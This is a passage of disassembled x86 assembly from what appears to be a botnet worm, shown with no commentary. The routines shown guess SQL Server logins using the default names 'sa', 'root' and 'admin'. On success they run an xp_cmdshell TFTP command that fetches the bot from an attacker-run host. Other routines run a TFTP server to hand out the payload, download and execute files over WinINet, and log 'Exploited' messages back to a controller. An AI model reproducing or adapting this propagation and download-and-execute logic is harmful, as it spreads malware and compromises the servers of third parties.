lea eax, [esp+10h+arg_200]
push eax
push offset aHttpSDS_1 ; "http://%s:%d/%s"
lea eax, [esp+18h+arg_210]
push edi
push eax
call sub_402AEE
lea eax, [esp+20h+arg_210]
add esp, 18h
lea ecx, [eax+1]
loc_41ADD1: ; CODE XREF: sub_41A9DE+3F8�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41ADD1
jmp short loc_41AE56
; ---------------------------------------------------------------------------
loc_41ADDA: ; CODE XREF: sub_41A9DE+395�j
push 100h
lea esi, [esp+0Ch+arg_210]
mov ebx, offset dword_425580
call sub_4196D1
pop ecx
jmp short loc_41AE60
; ---------------------------------------------------------------------------
loc_41ADF3: ; CODE XREF: sub_41A9DE+388�j
push ds:dword_4269BC
lea esi, [esp+0Ch+arg_200]
call sub_418FC6
lea esi, [esp+0Ch+arg_310]
mov ebx, offset byte_425061
mov [esp+0Ch+var_C], 100h
call sub_4196D1
pop ecx
mov eax, esi
push eax
push ds:dword_426594
lea eax, [esp+10h+arg_200]
push eax
push offset aHttpSDS_2 ; "http://%s:%d/%s"
lea eax, [esp+18h+arg_210]
push edi
push eax
call sub_402AEE
lea eax, [esp+20h+arg_210]
add esp, 18h
lea ecx, [eax+1]
loc_41AE4F: ; CODE XREF: sub_41A9DE+476�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41AE4F
loc_41AE56: ; CODE XREF: sub_41A9DE+3FA�j
sub eax, ecx
mov [esp+eax+8+arg_210], 0
loc_41AE60: ; CODE XREF: sub_41A9DE+413�j
lea eax, [esp+8+arg_210]
push eax
mov esi, offset dword_433950
push esi
call sub_41432A
test eax, eax
pop ecx
pop ecx
mov [esp+8+arg_C], eax
jz loc_41B126
mov edi, offset dword_424614
push edi
push eax
push esi
push 1
mov ebx, offset dword_433AC8
call sub_41411F
add esp, 10h
test eax, eax
jnz short loc_41AEB4
push edi
push [esp+0Ch+arg_C]
push esi
push 2
call sub_41411F
add esp, 10h
test eax, eax
jz loc_41B126
loc_41AEB4: ; CODE XREF: sub_41A9DE+4BC�j
mov esi, [esp+8+arg_4]
dec eax
push eax
mov eax, [esp+0Ch+arg_14]
add eax, esi
push ebx
push eax
call sub_407BF0
mov eax, [esp+14h+arg_1C]
mov eax, ds:dword_42462C[eax]
add esp, 0Ch
cmp [esp+8+arg_8], 1
jnz short loc_41AF07
mov ecx, ds:dword_433C68
mov [eax+esi], ecx
mov ecx, ds:dword_424644
add eax, 0Ch
mov [eax+esi], ecx
mov ecx, ds:dword_424644
lea eax, [eax+esi+24h]
mov [eax], ecx
mov ecx, ds:dword_424644
mov [eax+0Ch], ecx
jmp short loc_41AF21
; ---------------------------------------------------------------------------
loc_41AF07: ; CODE XREF: sub_41A9DE+4FB�j
cmp [esp+8+arg_8], 0
jnz short loc_41AF21
push 10h
add eax, esi
pop ecx
loc_41AF13: ; CODE XREF: sub_41A9DE+541�j
mov edx, ds:dword_424644
mov [eax], edx
add eax, 4
dec ecx
jnz short loc_41AF13
loc_41AF21: ; CODE XREF: sub_41A9DE+527�j
; sub_41A9DE+52E�j
mov edi, [esp+8+arg_18]
add edi, 42h
push edi
call sub_4036E0
mov ebx, eax
test ebx, ebx
pop ecx
jz loc_41B13C
push edi
push 0
push ebx
call sub_407B70
push 5
pop ecx
lea esi, [esp+14h+arg_94]
mov edi, ebx
rep movsd
mov esi, [esp+14h+arg_18]
mov eax, esi
test eax, eax
mov [esp+14h+arg_C], eax
fild [esp+14h+arg_C]
jge short loc_41AF68
fadd ds:flt_420D38
loc_41AF68: ; CODE XREF: sub_41A9DE+582�j
fmul ds:dbl_420D30
add esp, 4
fstp [esp+10h+arg_C]
fld [esp+10h+arg_C]
fstp qword ptr [esp]
call sub_403DA0
fstp [esp+10h+arg_C]
fld [esp+10h+arg_C]
call sub_41C156
and dword ptr [ebx+18h], 0
push esi
push [esp+14h+arg_4]
mov [ebx+1Ch], eax
mov [ebx+14h], eax
lea eax, [ebx+20h]
push eax
call sub_407BF0
add esp, 14h
lea eax, [esi+20h]
jmp short loc_41AFAF
; ---------------------------------------------------------------------------
loc_41AFAE: ; CODE XREF: sub_41A9DE+5D3�j
inc eax
loc_41AFAF: ; CODE XREF: sub_41A9DE+5CE�j
test al, 3
jnz short loc_41AFAE
push 7
lea edi, [ebx+eax]
pop ecx
push [esp+8+arg_4]
add eax, 1Ch
lea esi, [esp+0Ch+arg_78]
rep movsd
mov [esp+0Ch+arg_14], eax
call sub_403603
pop ecx
push 6
xor eax, eax
pop ecx
lea edi, [esp+8+arg_28]
rep stosd
mov byte ptr [esp+8+arg_28+1], al
mov byte ptr [esp+8+arg_28+2], al
lea edi, [esp+8+arg_40]
stosd
xor esi, esi
stosd
stosd
push esi
push esi
stosd
push 1
push esi
mov byte ptr [esp+18h+arg_28], 5
mov byte ptr [esp+18h+arg_28+3], 3
mov [esp+18h+arg_2C], 10h
mov word ptr [esp+18h+arg_30+2], si
mov [esp+18h+arg_34], esi
mov word ptr [esp+18h+arg_3C], si
mov word ptr [esp+18h+arg_3C+2], 1Fh
stosd
call ds:dword_41D09C
mov dword ptr [esp+8+arg_50], eax
mov byte ptr [esp+0Fh], 0
mov [esp+8+arg_4], esi
loc_41B030: ; CODE XREF: sub_41A9DE+6E4�j
cmp [esp+8+arg_4], 2
jge loc_41B0C8
inc [esp+8+arg_4]
push 1
push 10B8h
push [esp+10h+arg_14]
lea esi, [esp+14h+arg_28]
push ebx
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [esp+30h+arg_0]
rep movsd
call sub_416D6C
add esp, 2Ch
test al, al
jz short loc_41B0C8
cmp dword ptr [esp+8+arg_50], 0
jz short loc_41B0BD
lea eax, [esp+8+arg_40]
push eax
lea eax, [esp+0Ch+arg_20]
push eax
push 2000h
lea eax, [esp+14h+arg_4410]
push eax
push [esp+18h+arg_0]
call ds:dword_41D078
test eax, eax
jnz short loc_41B0A2
call ds:dword_41D0F0
cmp eax, 3E5h
jnz short loc_41B0BD
loc_41B0A2: ; CODE XREF: sub_41A9DE+6B5�j
push 3E8h
push dword ptr [esp+0Ch+arg_50]
call ds:dword_41D07C
cmp eax, 102h
jnz short loc_41B0BD
mov byte ptr [esp+0Fh], 1
loc_41B0BD: ; CODE XREF: sub_41A9DE+690�j
; sub_41A9DE+6C2�j ...
cmp byte ptr [esp+0Fh], 0
jz loc_41B030
loc_41B0C8: ; CODE XREF: sub_41A9DE+657�j
; sub_41A9DE+689�j
push [esp+8+arg_0]
mov esi, ds:dword_41D0DC
call esi
push ebx
call sub_403603
cmp [esp+10h+arg_4C], 0
pop ecx
jz short loc_41B0E8
push [esp+0Ch+arg_4C]
call esi
loc_41B0E8: ; CODE XREF: sub_41A9DE+702�j
cmp byte ptr [esp+0Fh], 0
jnz short loc_41B149
cmp [esp+0Ch+arg_4], 0
jnz short loc_41B10F
mov [esp+0Ch+arg_4], 1
xor ebx, ebx
jmp loc_41AA2A
; ---------------------------------------------------------------------------
loc_41B105: ; CODE XREF: sub_41A9DE+1E5�j
; sub_41A9DE+2F7�j
push [esp+8+arg_0]
call ds:dword_41D0DC
loc_41B10F: ; CODE XREF: sub_41A9DE+51�j
; sub_41A9DE+B9�j ...
xor al, al
loc_41B111: ; CODE XREF: sub_41A9DE+7BD�j
mov ecx, [esp+0Ch+arg_6410]
pop edi
pop esi
pop ebx
xor ecx, esp
call sub_402710
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41B126: ; CODE XREF: sub_41A9DE+49D�j
; sub_41A9DE+4D0�j
push [esp+8+arg_0]
call ds:dword_41D0DC
push [esp+0Ch+arg_0]
loc_41B134: ; CODE XREF: sub_41A9DE+769�j
call sub_403603
pop ecx
jmp short loc_41B10F
; ---------------------------------------------------------------------------
loc_41B13C: ; CODE XREF: sub_41A9DE+555�j
push [esp+8+arg_0]
call ds:dword_41D0DC
push esi
jmp short loc_41B134
; ---------------------------------------------------------------------------
loc_41B149: ; CODE XREF: sub_41A9DE+70F�j
push [esp+0Ch+arg_20]
call ds:dword_41D260
push eax
mov eax, [esp+10h+arg_1EC]
imul eax, 2Ch
add eax, offset dword_424528
push eax
push offset aSExploitedS_ ; "%s: Exploited: %s."
lea eax, [esp+18h+arg_EC]
push eax
push [esp+1Ch+arg_1F8]
push offset dword_4269BC
call sub_417361
mov eax, [esp+24h+arg_1EC]
imul eax, 2Ch
lea eax, dword_42454C[eax]
add esp, 18h
inc dword ptr [eax]
mov al, [esp+0Fh]
jmp loc_41B111
sub_41A9DE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=0CD8h
sub_41B1A0 proc near ; DATA XREF: .kSjx934:0042457C�o
var_D54 = dword ptr -0D54h
var_D50 = dword ptr -0D50h
var_D4C = dword ptr -0D4Ch
var_D48 = dword ptr -0D48h
var_D44 = byte ptr -0D44h
var_D40 = dword ptr -0D40h
var_D3C = dword ptr -0D3Ch
var_D38 = dword ptr -0D38h
var_D34 = dword ptr -0D34h
var_D30 = dword ptr -0D30h
var_D2C = dword ptr -0D2Ch
var_D26 = byte ptr -0D26h
var_D25 = byte ptr -0D25h
var_D24 = byte ptr -0D24h
var_C24 = dword ptr -0C24h
var_C20 = dword ptr -0C20h
var_C1C = dword ptr -0C1Ch
var_C18 = dword ptr -0C18h
var_C14 = byte ptr -0C14h
var_814 = byte ptr -814h
var_414 = byte ptr -414h
var_14 = byte ptr -14h
var_13 = byte ptr -13h
var_4 = dword ptr -4
arg_0 = byte ptr 8
push ebp
lea ebp, [esp-0CD8h]
sub esp, 0D54h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+0CD8h+var_4], eax
push ebx
push esi
push edi
push 44h
pop ecx
xor ebx, ebx
xor eax, eax
mov [ebp+0CD8h+var_14], bl
lea esi, [ebp+0CD8h+arg_0]
lea edi, [ebp+0CD8h+var_D24]
rep movsd
lea edi, [ebp+0CD8h+var_13]
stosd
stosd
stosd
stosw
stosb
mov eax, [ebp+0CD8h+var_C20]
mov [ebp+0CD8h+var_D40], eax
lea eax, [ebp+0CD8h+var_D34]
push eax
push ebx
push 1
mov [ebp+0CD8h+var_D26], bl
mov [ebp+0CD8h+var_D54], offset aSa ; "sa"
mov [ebp+0CD8h+var_D50], offset aRoot ; "root"
mov [ebp+0CD8h+var_D4C], offset aAdmin ; "admin"
mov [ebp+0CD8h+var_D48], ebx
mov [ebp+0CD8h+var_D25], bl
mov [ebp+0CD8h+var_D2C], ebx
mov [ebp+0CD8h+var_D30], ebx
call sub_402630
test ax, ax
jz short loc_41B23A
loc_41B220: ; CODE XREF: sub_41B1A0+AE�j
xor al, al
loc_41B222: ; CODE XREF: sub_41B1A0+CF�j
mov ecx, [ebp+0CD8h+var_4]
pop edi
pop esi
xor ecx, ebp
pop ebx
call sub_402710
add ebp, 0CD8h
leave
retn
; ---------------------------------------------------------------------------
loc_41B23A: ; CODE XREF: sub_41B1A0+7E�j
push 0FFFFFFFAh
push 3
push 0C8h
push [ebp+0CD8h+var_D34]
call sub_402624
test ax, ax
jnz short loc_41B220
lea eax, [ebp+0CD8h+var_D2C]
push eax
push [ebp+0CD8h+var_D34]
push 2
call sub_402630
test ax, ax
jz short loc_41B271
loc_41B263: ; CODE XREF: sub_41B1A0+22B�j
push [ebp+0CD8h+var_D34]
push 1
call sub_402636
mov al, bl
jmp short loc_41B222
; ---------------------------------------------------------------------------
loc_41B271: ; CODE XREF: sub_41B1A0+C1�j
mov edi, ds:dword_41D260
lea ecx, [ebp+0CD8h+var_D54]
mov [ebp+0CD8h+var_D3C], ecx
loc_41B27D: ; CODE XREF: sub_41B1A0+1D0�j
cmp ds:off_424650, ebx
mov [ebp+0CD8h+var_D38], ebx
jz loc_41B365
mov esi, [ecx]
mov eax, offset off_424650
loc_41B293: ; CODE XREF: sub_41B1A0+16B�j
lea ecx, [ebp+0CD8h+var_D26]
push ecx
push dword ptr [eax]
push esi
push [ebp+0CD8h+var_C1C]
push [ebp+0CD8h+var_D40]
call edi
push eax
lea eax, [ebp+0CD8h+var_414]
push offset aDriverSqlServe ; "DRIVER={SQL Server};SERVER=%s,%d;UID=%s"...
push eax
call sub_4030B5
lea eax, [ebp+0CD8h+var_414]
add esp, 1Ch
lea ecx, [eax+1]
loc_41B2C3: ; CODE XREF: sub_41B1A0+128�j
mov dl, [eax]
inc eax
cmp dl, bl
jnz short loc_41B2C3
push ebx
sub eax, ecx
lea ecx, [ebp+0CD8h+var_D44]
push ecx
push 400h
lea ecx, [ebp+0CD8h+var_C14]
push ecx
push eax
lea eax, [ebp+0CD8h+var_414]
push eax
push ebx
push [ebp+0CD8h+var_D2C]
call sub_40262A
movzx eax, ax
cmp ax, bx
jz short loc_41B30F
cmp ax, 1
jz short loc_41B30F
inc [ebp+0CD8h+var_D38]
mov eax, [ebp+0CD8h+var_D38]
lea eax, ds:424650h[eax*4]
cmp [eax], ebx
jnz short loc_41B293
jmp short loc_41B365
; ---------------------------------------------------------------------------
loc_41B30F: ; CODE XREF: sub_41B1A0+154�j
; sub_41B1A0+15A�j
lea eax, [ebp+0CD8h+var_D30]
push eax
push [ebp+0CD8h+var_D2C]
push 3
call sub_402630
push ds:dword_4269BC
lea esi, [ebp+0CD8h+var_14]
call sub_418FC6
mov eax, esi
push eax
lea eax, [ebp+0CD8h+var_814]
push offset aExecMaster__xp ; "EXEC master..xp_cmdshell 'tftp -i %s GE"...
push eax
call sub_4030B5
add esp, 10h
push 0FFFFFFFDh
lea eax, [ebp+0CD8h+var_814]
push eax
push [ebp+0CD8h+var_D30]
call sub_40263C
test ax, ax
jz short loc_41B378
push [ebp+0CD8h+var_D30]
push 3
call sub_402636
loc_41B365: ; CODE XREF: sub_41B1A0+E6�j
; sub_41B1A0+16D�j
mov ecx, [ebp+0CD8h+var_D3C]
add ecx, 4
cmp [ecx], ebx
mov [ebp+0CD8h+var_D3C], ecx
jnz loc_41B27D
jmp short loc_41B3BE
; ---------------------------------------------------------------------------
loc_41B378: ; CODE XREF: sub_41B1A0+1B9�j
push [ebp+0CD8h+var_D40]
mov [ebp+0CD8h+var_D25], 1
call edi
push eax
mov eax, [ebp+0CD8h+var_C24]
imul eax, 2Ch
add eax, offset dword_424528
push eax
push offset aSExploitedS__0 ; "%s: Exploited %s."
lea eax, [ebp+0CD8h+var_D24]
push eax
push [ebp+0CD8h+var_C18]
push offset dword_4269BC
call sub_417361
mov eax, [ebp+0CD8h+var_C24]
imul eax, 2Ch
lea eax, dword_42454C[eax]
add esp, 18h
inc dword ptr [eax]
loc_41B3BE: ; CODE XREF: sub_41B1A0+1D6�j
push [ebp+0CD8h+var_D2C]
push 2
call sub_402636
mov bl, [ebp+0CD8h+var_D25]
jmp loc_41B263
sub_41B1A0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B3D0 proc near ; DATA XREF: sub_41B5D2+15A�o
var_23C = dword ptr -23Ch
var_238 = dword ptr -238h
var_230 = dword ptr -230h
var_22C = dword ptr -22Ch
var_228 = dword ptr -228h
var_224 = word ptr -224h
var_222 = word ptr -222h
var_220 = byte ptr -220h
var_18 = byte ptr -18h
var_14 = dword ptr -14h
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 240h
mov eax, ds:dword_423064
xor eax, ebp
mov [ebp+var_8], eax
push ebx
push esi
mov esi, [ebp+arg_0]
xor ebx, ebx
cmp esi, ebx
push edi
jnz short loc_41B3F6
loc_41B3EF: ; CODE XREF: sub_41B3D0+42�j
; sub_41B3D0+5D�j ...
push ebx
call ds:dword_41D08C
loc_41B3F6: ; CODE XREF: sub_41B3D0+1D�j
lea edi, [ebp+var_18]
movsd
movsd
push 11h
movsd
push 2
push 2
movsd
call ds:dword_41D27C
cmp eax, 0FFFFFFFFh
mov [ebp+var_230], eax
jz short loc_41B3EF
push offset aRb ; "rb"
push offset dword_4269E8
call sub_4031F4
cmp eax, ebx
pop ecx
pop ecx
mov [ebp+var_228], eax
jz short loc_41B3EF
push eax
mov [ebp+var_22C], ebx
mov [ebp+var_23C], 10h
call sub_403AF3
test eax, eax
pop ecx
jnz loc_41B53E
mov esi, ds:dword_41D278
loc_41B454: ; CODE XREF: sub_41B3D0+168�j
push 204h
lea eax, [ebp+var_224]
push ebx
push eax
call sub_407B70
add esp, 0Ch
xor eax, eax
inc [ebp+var_22C]
push [ebp+var_22C]
lea edi, [ebp+var_238]
stosd
call esi
push 3
mov [ebp+var_222], ax
call esi
push [ebp+var_228]
mov [ebp+var_224], ax
push 200h
lea eax, [ebp+var_220]
push 1
push eax
call sub_403D7F
mov edi, [ebp+var_230]
add esp, 10h
push 10h
lea ecx, [ebp+var_18]
push ecx
push ebx
add eax, 4
push eax
lea eax, [ebp+var_224]
push eax
push edi
call ds:dword_41D24C
cmp eax, 0FFFFFFFFh
jz loc_41B5BA
lea eax, [ebp+var_23C]
push eax
lea eax, [ebp+var_18]
push eax
push ebx
push 4
lea eax, [ebp+var_238]
push eax
push edi
call ds:dword_41D25C
cmp eax, 0FFFFFFFFh
jz loc_41B5BA
push [ebp+var_238]
call ds:dword_41D254
cmp ax, 4
jnz loc_41B5BA
push [ebp+var_238+2]
call ds:dword_41D254
cmp ax, word ptr [ebp+var_22C]
jnz loc_41B5BA
push [ebp+var_228]
call sub_403AF3
test eax, eax
pop ecx
jz loc_41B454
loc_41B53E: ; CODE XREF: sub_41B3D0+78�j
inc ds:dword_43394C
push 100h
call sub_402648
mov esi, eax
push esi
call sub_402A45
push eax
mov ebx, offset dword_424ED0
call sub_4196D1
add esp, 0Ch
push ds:dword_43394C
push [ebp+var_14]
call ds:dword_41D260
push eax
push offset aTftpSendComple ; "TFTP: Send Complete To %s. %d Total Sen"...
push esi
push 0
push offset dword_4269BC
call sub_417361
push esi
call sub_402B9B
add esp, 1Ch
push [ebp+var_230]
call ds:dword_41D224
push [ebp+var_228]
call sub_4034C4
pop ecx
mov ecx, [ebp+var_8]
pop edi
pop esi
xor ecx, ebp
xor eax, eax
pop ebx
call sub_402710
leave
retn 4
; ---------------------------------------------------------------------------
loc_41B5BA: ; CODE XREF: sub_41B3D0+100�j
; sub_41B3D0+125�j ...
push edi
call ds:dword_41D224
push [ebp+var_228]
call sub_4034C4
pop ecx
jmp loc_41B3EF
sub_41B3D0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B5D2 proc near ; DATA XREF: sub_41B775+53�o
var_148 = dword ptr -148h
var_144 = dword ptr -144h
var_140 = dword ptr -140h
var_13C = dword ptr -13Ch
var_138 = byte ptr -138h
var_134 = dword ptr -134h
var_120 = dword ptr -120h
var_11C = dword ptr -11Ch
var_14 = word ptr -14h
var_12 = word ptr -12h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 14Ch
mov eax, ds:dword_423064
xor eax, esp
mov [esp+14Ch+var_4], eax
push ebx
push esi
push edi
push 11h
xor esi, esi
push 2
inc esi
push 2
mov [esp+164h+var_140], esi
call ds:dword_41D27C
cmp eax, 0FFFFFFFFh
mov ds:dword_4269E4, eax
jnz short loc_41B61B
xor ebx, ebx
loc_41B60E: ; CODE XREF: sub_41B5D2+C1�j
mov ds:byte_433945, bl
loc_41B614: ; CODE XREF: sub_41B5D2+BF�j
push ebx
call ds:dword_41D08C
loc_41B61B: ; CODE XREF: sub_41B5D2+38�j
push 4
lea ecx, [esp+15Ch+var_140]
push ecx
push 4
push 0FFFFh
push eax
call ds:dword_41D250
xor eax, eax
lea edi, [esp+158h+var_14]
stosd
stosd
stosd
stosd
push 45h
mov [esp+15Ch+var_14], 2
call ds:dword_41D278
mov [esp+158h+var_12], ax
push 10h
lea eax, [esp+15Ch+var_14]
push eax
push ds:dword_4269E4
xor ebx, ebx
mov [esp+164h+var_10], ebx
call ds:dword_41D26C
cmp eax, 0FFFFFFFFh
jnz loc_41B744
push ds:dword_4269E4
call ds:dword_41D224
cmp ds:byte_433945, bl
jz short loc_41B614
jmp loc_41B60E
; ---------------------------------------------------------------------------
loc_41B698: ; CODE XREF: sub_41B5D2+178�j
mov eax, ds:dword_4269E4
mov [esp+158h+var_11C], eax
xor eax, eax
lea edi, [esp+158h+var_148]
stosd
stosd
lea eax, [esp+158h+var_148]
push eax
push ebx
push ebx
lea eax, [esp+164h+var_120]
push eax
push ebx
mov [esp+16Ch+var_120], esi
mov [esp+16Ch+var_148], 5
mov [esp+16Ch+var_144], ebx
call ds:dword_41D258
test eax, eax
jle short loc_41B744
xor eax, eax
lea edi, [esp+158h+var_134]
stosd
stosd
stosd
stosd
stosd
lea eax, [esp+158h+var_13C]
push eax
lea eax, [esp+15Ch+var_14]
push eax
push ebx
push 14h
lea eax, [esp+168h+var_134]
push eax
push ds:dword_4269E4
mov [esp+170h+var_13C], 10h
call ds:dword_41D25C
cmp eax, 0FFFFFFFFh
jz short loc_41B744
push [esp+158h+var_134]
inc ds:dword_433948
call ds:dword_41D254
cmp ax, si
jnz short loc_41B744
lea eax, [esp+158h+var_138]
push eax
push ebx
lea eax, [esp+160h+var_14]
push eax
push offset sub_41B3D0
push ebx
push ebx
call ds:dword_41D110
push 3E8h
call ds:dword_41D0FC
loc_41B744: ; CODE XREF: sub_41B5D2+A7�j
; sub_41B5D2+FC�j ...
cmp ds:byte_433945, bl
jnz loc_41B698
push ds:dword_4269E4
call ds:dword_41D224
mov ecx, [esp+158h+var_4]
pop edi
pop esi
pop ebx
xor ecx, esp
xor eax, eax
call sub_402710
mov esp, ebp
pop ebp
retn 4
sub_41B5D2 endp
; =============== S U B R O U T I N E =======================================
sub_41B775 proc near ; CODE XREF: sub_401F1C+5A�p
; .kSjx934:0041BFB5�p
push 4
mov eax, offset loc_41C274
call sub_4045CC
xor ebx, ebx
cmp ds:byte_433945, bl
jz short loc_41B78F
loc_41B78B: ; CODE XREF: sub_41B775+74�j
mov al, 1
jmp short loc_41B7F3
; ---------------------------------------------------------------------------
loc_41B78F: ; CODE XREF: sub_41B775+14�j
mov edi, 100h
push edi
push ebx
mov esi, offset dword_4269E8
push esi
call sub_407B70
add esp, 0Ch
push edi
push esi
push ebx
call ds:dword_41D0E4
push eax
call ds:dword_41D060
push 8
call sub_40304B
mov esi, eax
pop ecx
mov [ebp-10h], esi
cmp esi, ebx
mov [ebp-4], ebx
jz short loc_41B7DB
push offset sub_41B5D2
xor ecx, ecx
mov edi, offset aTftpServer ; "TFTP Server"
call sub_4140AB
jmp short loc_41B7DD
; ---------------------------------------------------------------------------
loc_41B7DB: ; CODE XREF: sub_41B775+51�j
xor eax, eax
loc_41B7DD: ; CODE XREF: sub_41B775+64�j
cmp [eax+4], ebx
jz short loc_41B7EB
mov ds:byte_433945, 1
jmp short loc_41B78B
; ---------------------------------------------------------------------------
loc_41B7EB: ; CODE XREF: sub_41B775+6B�j
mov ds:byte_433945, bl
xor al, al
loc_41B7F3: ; CODE XREF: sub_41B775+18�j
call sub_40466B
retn
sub_41B775 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41B7F9 proc near ; CODE XREF: sub_40177B+6C�p
; sub_4019F3+6C�p ...
var_3DC = dword ptr -3DCh
var_3D8 = byte ptr -3D8h
var_308 = byte ptr -308h
var_307 = byte ptr -307h
var_208 = byte ptr -208h
var_207 = byte ptr -207h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 3E0h
mov eax, ds:dword_423064
xor eax, esp
mov [esp+3E0h+var_4], eax
mov eax, [ebp+arg_0]
push ebx
push esi
mov esi, 1FFh
xor ebx, ebx
push esi
mov [esp+3ECh+var_3DC], eax
lea eax, [esp+3ECh+var_207]
push ebx
push eax
mov [esp+3F4h+var_208], bl
call sub_407B70
add esp, 0Ch
push 0FFh
lea eax, [esp+3ECh+var_307]
push ebx
push eax
mov [esp+3F4h+var_308], bl
call sub_407B70
add esp, 0Ch
lea eax, [esp+3E8h+var_3D8]
call sub_4143A0
push [esp+3E8h+var_3DC]
lea eax, [esp+3ECh+var_208]
push offset aS_15 ; "%s"
push esi
push eax
call sub_402AEE
lea eax, [esp+3F8h+var_208]
add esp, 10h
lea esi, [eax+1]
loc_41B886: ; CODE XREF: sub_41B7F9+92�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_41B886
lea ecx, [esp+3E8h+var_3D8]
push ecx
sub eax, esi
push eax
lea ecx, [esp+3F0h+var_208]
call sub_416C60
push 200h
lea eax, [esp+3F4h+var_208]
push ebx
push eax
call sub_407B70
lea eax, [esp+3FCh+var_308]
add esp, 14h
push eax
lea ebx, [esp+3ECh+var_3D8]
call sub_416AE0
pop ecx
push 0C0h
push 0
push edi
call sub_407B70
add esp, 0Ch
xor esi, esi
loc_41B8DB: ; CODE XREF: sub_41B7F9+114�j
movzx eax, [esp+esi+3E8h+var_308]
push eax
push edi
push offset aSX ; "%s%X"
push 0BFh
push edi
call sub_402AEE
mov eax, edi
add esp, 14h
lea ecx, [eax+1]
loc_41B8FD: ; CODE XREF: sub_41B7F9+109�j
mov dl, [eax]
inc eax
test dl, dl
jnz short loc_41B8FD
sub eax, ecx
inc esi
cmp esi, 40h
mov [eax+edi], dl
jl short loc_41B8DB
mov ecx, [esp+3E8h+var_4]
pop esi
pop ebx
xor ecx, esp
mov eax, edi
call sub_402710
mov esp, ebp
pop ebp
retn
sub_41B7F9 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
and esp, 0FFFFFFF8h
sub esp, 754h
mov eax, ds:dword_423064
xor eax, esp
mov [esp+750h], eax
push ebx
push esi
mov esi, [ebp+8]
push edi
mov ecx, 0C9h
lea edi, [esp+28h]
rep movsd
xor ebx, ebx
push ebx
push ebx
push ebx
movsw
push ebx
push offset aMozilla5_0 ; "Mozilla/5.0"
movsb
call ds:dword_41D21C
mov esi, eax
lea eax, [esp+24Bh]
push eax
lea eax, [esp+14Fh]
push eax
push offset aDlDownloadingS ; "DL: Downloading %s to %s"
lea eax, [esp+34h]
push eax
push dword ptr [esp+35Dh]
mov edi, offset dword_4269BC
push edi
call sub_417361
add esp, 18h
push ebx
push ebx
push ebx
push ebx
lea eax, [esp+15Bh]
push eax
push esi
call ds:dword_41D218
cmp esi, ebx
mov [esp+1Ch], eax
jz loc_41BB44
cmp eax, ebx
jz loc_41BB3D
push ebx
push ebx
push 2
push ebx
push ebx
push 40000000h
lea eax, [esp+263h]
push eax
call ds:dword_41D06C
mov [esp+18h], eax
call ds:dword_41D108
mov [esp+20h], eax
mov [esp+10h], ebx
mov esi, 400h
loc_41B9EC: ; CODE XREF: .kSjx934:0041BA44�j
push esi
lea eax, [esp+35Ch]
push ebx
push eax
call sub_407B70
add esp, 0Ch
lea eax, [esp+14h]
push eax
push esi
lea eax, [esp+360h]
push eax
push dword ptr [esp+28h]
call ds:dword_41D214
push ebx
lea eax, [esp+28h]
push eax
push dword ptr [esp+1Ch]
lea eax, [esp+364h]
push eax
push dword ptr [esp+28h]
call ds:dword_41D088
test eax, eax
jz loc_41BAEF
mov eax, [esp+14h]
add [esp+10h], eax
cmp eax, ebx
ja short loc_41B9EC
call ds:dword_41D108
sub eax, [esp+20h]
xor edx, edx
mov ecx, 3E8h
div ecx
mov ecx, eax
cmp ecx, ebx
jnz short loc_41BA62
xor ecx, ecx
inc ecx
loc_41BA62: ; CODE XREF: .kSjx934:0041BA5D�j
mov eax, [esp+10h]
xor edx, edx
div ecx
shr eax, 0Ah
push eax
push ecx
push dword ptr [esp+18h]
lea eax, [esp+257h]
push eax
push offset aDlDownloadSIBy ; "DL: Download %s (%i Bytes) finished in "...
lea eax, [esp+3Ch]
push eax
push dword ptr [esp+365h]
push edi
call sub_417361
add esp, 20h
push dword ptr [esp+18h]
call ds:dword_41D0DC
cmp byte ptr [esp+34Bh], 1
jnz loc_41BB5E
cmp [esp+34Ch], bl
lea eax, [esp+24Bh]
jz short loc_41BAFD
push eax
call sub_419219
test al, al
pop ecx
lea eax, [esp+28h]
jz short loc_41BAF6
push offset aMainUninstalli ; "Main: Uninstalling Drone"
push eax
push dword ptr [esp+355h]
push edi
call sub_417361
add esp, 10h
lea eax, [esp+128h]
push eax
call sub_419477
loc_41BAEF: ; CODE XREF: .kSjx934:0041BA34�j
push offset aDlFailedBadLoc ; "DL: Failed; Bad Location."
jmp short loc_41BB49
; ---------------------------------------------------------------------------
loc_41BAF6: ; CODE XREF: .kSjx934:0041BACA�j
push offset aDlFailedToUpda ; "DL: Failed To Update"
jmp short loc_41BB4D
; ---------------------------------------------------------------------------
loc_41BAFD: ; CODE XREF: .kSjx934:0041BABB�j
push 5
push ebx
push ebx
push eax
push offset byte_41EF0F
push ebx
call ds:dword_41D1E4
test eax, eax
jnz short loc_41BB19
push offset aDlErrorExecuti ; "DL: Error Executing File."
jmp short loc_41BB49
; ---------------------------------------------------------------------------
loc_41BB19: ; CODE XREF: .kSjx934:0041BB10�j
lea eax, [esp+24Bh]
push eax
push offset aDlExecutedFile ; "DL: Executed File: %s"
lea eax, [esp+30h]
push eax
push dword ptr [esp+359h]
push edi
call sub_417361
add esp, 14h
jmp short loc_41BB5E
; ---------------------------------------------------------------------------
loc_41BB3D: ; CODE XREF: .kSjx934:0041B9B6�j
push offset aDlFailedBadUrl ; "DL: Failed; Bad URL"
jmp short loc_41BB49
; ---------------------------------------------------------------------------
loc_41BB44: ; CODE XREF: .kSjx934:0041B9AE�j
push offset aDlFailedWinine ; "DL: Failed; WinINET Error"
loc_41BB49: ; CODE XREF: .kSjx934:0041BAF4�j
; .kSjx934:0041BB17�j ...
lea eax, [esp+2Ch]
loc_41BB4D: ; CODE XREF: .kSjx934:0041BAFB�j
push eax
